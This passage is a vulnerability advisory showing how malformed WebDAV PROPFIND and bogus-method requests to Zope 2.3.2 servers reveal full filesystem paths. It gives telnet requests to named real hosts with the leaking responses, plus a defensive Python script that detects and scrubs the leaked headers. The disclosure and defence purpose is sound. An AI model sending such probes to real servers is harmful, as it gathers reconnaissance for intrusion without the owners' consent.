Vulnerability found: it is possible to retrieve the full path to local files in Zope.
---[ Example 1 (Linux):
telnet www.zope.org 80
PROPFIND / HTTP/1.0
F
G
H
J
K
L
HTTP/1.0 500 Internal Server Error
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Mon, 10 Sep 2001 15:38:59 GMT
Content-Length: 7058
Ms-Author-Via: DAV
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py
Bobo-Exception-Type: TypeError
Content-Type: text/html
Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML HEAD TITLEWelcome to Zope.org/TITLE link rel=stylesheet href=http://www.zope.org/zope_css; type=text/css /HEAD BODY B
Bobo-Exception-Line: 369
...
!--
Traceback (innermost last):
File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, in publish_module
File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
File /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, in zpublisher_exception_hook
(Object: ApplicationDefaultPermissions)
File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 171, in publish
File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/mapply.py, line 160, in mapply
(Object: PROPFIND)
File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 112, in call_object
(Object: PROPFIND)
File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Resource.py, line 222, in PROPFIND
(Object: ApplicationDefaultPermissions)
File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 175, in apply
File /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop
(Object: Virtual)
TypeError: (see above)
--
Host has closed connection.
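
A defender-side check for the leak shown in Example 1, as an added example that is not part of the original advisory: it lists the Bobo-Exception-* headers and filesystem paths a response discloses, and produces the scrubbed form a front-end proxy could forward instead. The sample response is constructed from the output above (shortened, with HTML comment markers and quotes assumed); the function names are hypothetical.

```python
import re

# Constructed sample modelled on the Example 1 response (shortened).
# Assumption: the traceback sits in an HTML comment with quoted file names.
SAMPLE = (
    "HTTP/1.0 500 Internal Server Error\r\n"
    "Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1\r\n"
    "Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py\r\n"
    "Bobo-Exception-Type: TypeError\r\n"
    "Bobo-Exception-Line: 369\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>Error\n<!--\nTraceback (innermost last):\n"
    '  File "/usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py", line 175, in apply\n'
    "TypeError: (see above)\n-->\n</body></html>"
)

LEAK_HEADER = re.compile(r"^bobo-exception-", re.I)
TRACEBACK_COMMENT = re.compile(r"<!--\s*Traceback.*?-->", re.S)
FRAME_PATH = re.compile(r'File "?(/[^",\s]+)')  # quoted or unquoted frame path

def split_response(raw):
    """Split a raw HTTP response into status line, header lines and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    return lines[0], lines[1:], body

def find_leaks(raw):
    """Return (leaking header names, sorted filesystem paths the response discloses)."""
    _, headers, body = split_response(raw)
    names, paths = [], set()
    for h in headers:
        name, _, value = h.partition(":")
        if LEAK_HEADER.match(name):
            names.append(name)
            if value.strip().startswith("/"):
                paths.add(value.strip())
    for block in TRACEBACK_COMMENT.findall(body):
        paths.update(FRAME_PATH.findall(block))
    return names, sorted(paths)

def scrub(raw):
    """Drop Bobo-Exception-* headers and the traceback comment; fix Content-Length."""
    status, headers, body = split_response(raw)
    body = TRACEBACK_COMMENT.sub("", body)
    kept = [h for h in headers
            if not LEAK_HEADER.match(h) and not h.lower().startswith("content-length:")]
    kept.append("Content-Length: %d" % len(body.encode("latin-1")))
    return "\r\n".join([status] + kept) + "\r\n\r\n" + body
```
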
---[ Example 2 (Linux):
telnet www.zope.com 80
/ HTTP/1.0
or NOTREALCOMMAND / HTTP/1.0
HTTP/1.0 404 Not Found
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Fri, 21 Sep 2001 12:51:48 GMT
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py
Content-Type: text/html
Bobo-Exception-Type: NotFound
Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML HEAD TITLEWelcome to Zope.org/TITLE link rel=stylesheet href=http://www.zope.org/zope_css; type=text/css /HEAD BODY B
Content-Length: 5845
Bobo-Exception-Line: 547
...
!--
Traceback (innermost last):
File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, in publish_module
File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
File /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, in zpublisher_exception_hook
(Object: ApplicationDefaultPermissions)
File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 173, in publish
File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py, line 308, in setBody
File /usr/loc